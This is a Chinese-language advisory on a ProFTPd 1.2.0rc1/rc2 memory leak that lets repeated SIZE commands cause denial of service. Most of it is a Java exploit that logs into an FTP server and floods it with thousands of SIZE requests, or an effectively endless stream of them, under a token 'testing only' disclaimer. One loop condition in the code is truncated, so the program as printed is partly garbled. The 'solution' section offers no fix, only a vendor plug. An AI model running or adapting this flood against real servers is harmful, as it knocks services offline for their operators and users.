ProFTPd 遠(yuǎn)程拒絕服務(wù)漏洞 (APP,缺陷) ：當(dāng) ProFTPd 執(zhí)行 SIZE FTP 命令時(shí)會(huì)引起內(nèi)存泄露漏洞。如果發(fā)送更多的SIZE 命令將引起拒絕服務(wù)攻擊。以下是詳細(xì)內(nèi)容。

　　涉及程序：

　　ProFTPd

　　描述：

　　ProFTPd 內(nèi)存泄露引起拒絕服務(wù)攻擊

　　詳細(xì)：

　　ProFTPd 是一款非常流行的 FTP 服務(wù)器。發(fā)現(xiàn)它存在一個(gè)安全漏洞，允許惡意用戶對(duì)它進(jìn)行拒絕服務(wù)攻擊。

　　當(dāng) ProFTPd 執(zhí)行 SIZE FTP 命令時(shí)會(huì)引起內(nèi)存泄露漏洞，如果發(fā)送大約5000次 SIZE FTP 命令到服務(wù)器中可能引起 ProFTPd 耗費(fèi)超過300KB的內(nèi)存。如果發(fā)送更多的SIZE 命令將引起拒絕服務(wù)攻擊。

　　以下代碼僅僅用來測(cè)試和研究這個(gè)漏洞，如果您將其用于不正當(dāng)?shù)耐緩秸?qǐng)后果自負(fù)

　　*/  
 
　　import java.net.*;  
 
　　import java.io.*;  
 
　　class TCPconnection {  
 
　　public TCPconnection (String hostname, int portnumber) throws Exception {  
 
　　Socket s = doaSocket(hostname, portnumber);  
 
　　br = new BufferedReader (new InputStreamReader (s.getInputStream()));  
 
　　ps = new PrintStream (s.getOutputStream());  
 
　　}  
 
　　public String readLine() throws Exception {  
 
　　String s;  
 
　　try { s = br.readLine(); }  
 
　　catch (IOException ioe) {  
 
　　System.out.println("TCP Error ... it's a little hax0r exception ;-)");  
 
　　throw new Exception ("\nInput Error: I/O Error");  
 
　　}  
 
　　return s;  
 
　　}  
 
　　public void println(String s) {  
 
　　ps.println(s);  
 
　　}  
 
　　private Socket doaSocket(String hostname, int portnumber) throws Exception {  
 
　　Socket s = null;  
 
　　int attempts = 0;  
 
　　while (s == null && attempts   
 
　　try { s = new Socket(hostname, portnumber); }  
 
　　catch (UnknownHostException uhe) {  
 
　　System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");  
 
　　throw new Exception("\nConnection Error: " + "unknown hostname");  
 
　　}  
 
　　catch (IOException ioe) {  
 
　　System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");  
 
　　}  
 
　　attempts++;  
 
　　}  
 
　　if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");  
 
　　else return s; }  
 
　　private final int maxattempts = 5;  
 
　　private BufferedReader br;  
 
　　private PrintStream ps;  
 
　　}  
 
　　class proftpDoS {  
 
　　public static void main(String[] arg) throws Exception {  
 
　　InputStreamReader isr;  
 
　　BufferedReader tcld;  
 
　　String hostnamez, username, password, file, s1, option;  
 
　　int i, j, k;  
 
　　isr = new InputStreamReader(System.in);  
 
　　tcld = new BufferedReader(isr);  
 
　　System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");  
 
　　System.out.println("Code in an attempt to solve Fermat Last's Theoreme");  
 
　　hostnamez = "";  
 
　　while (hostnamez.length()==0) {  
 
　　System.out.print("Please enter the hostname/IP: ");  
 
　　hostnamez = tcld.readLine(); }  
 
　　username = "";  
 
　　while (username.length()==0) {  
 
　　System.out.print("Enter the username: ");  
 
　　username = tcld.readLine(); }  
 
　　password = "";  
 
　　while (password.length()==0) {  
 
　　System.out.print("Enter the password for that username: ");  
 
　　password = tcld.readLine(); }  
 
　　file = "";  
 
　　while (file.length()==0) {  
 
　　System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");  
 
　　file = tcld.readLine(); }  
 
　　System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");  
 
　　System.out.println("1) Request 10000 size's to the server (it may be enough)");  
 
　　System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");  
 
　　System.out.print("Option: ");  
 
　　option = tcld.readLine();  
 
　　k = Integer.parseInt(option);  
 
　　while (!(k==1 || k==2)) {  
 
　　System.out.print("Option not valid, please try again: ");  
 
　　option = tcld.readLine();  
 
　　k = Integer.parseInt(option); }  
 
　　TCPconnection tc = new TCPconnection(hostnamez, 21);  
 
　　tc.println("user " + username);  
 
　　tc.println("pass " + password);  
 
　　if (k==1) {  
 
　　for(i=0;i<10000;i++)  
 
　　tc.println("size " + file); }  
 
　　else if (k==2) {  
 
　　for(i=1;i<100;i++)  
 
　　for(j=2;j<((int)Math.pow(j,i ));j++)  
 
　　tc.println("size " + file); }  
 
　　tc.println("quit");  
 
　　s1 = tc.readLine();  
 
　　while (s1!=null) {  
 
　　s1 = tc.readLine();  
 
　　System.out.println("Attack completed ... as one of my friends says:");  
 
　　System.out.println("Hack just r0cks ;-)");  
 
　　}  
 
　　}  
 
　　}  
 

　　受影響的系統(tǒng)：

　　ProFTPd 1.2.0rc1

　　ProFTPd 1.2.0rc2

　　解決方案：

　　CNNS 為您提供完善的網(wǎng)絡(luò)安全服務(wù)。

【編輯推薦】

• Proftpd 建表
• Proftpd的結(jié)構(gòu)
• Proftpd常用參數(shù)說明
• Proftpd配置之本地用戶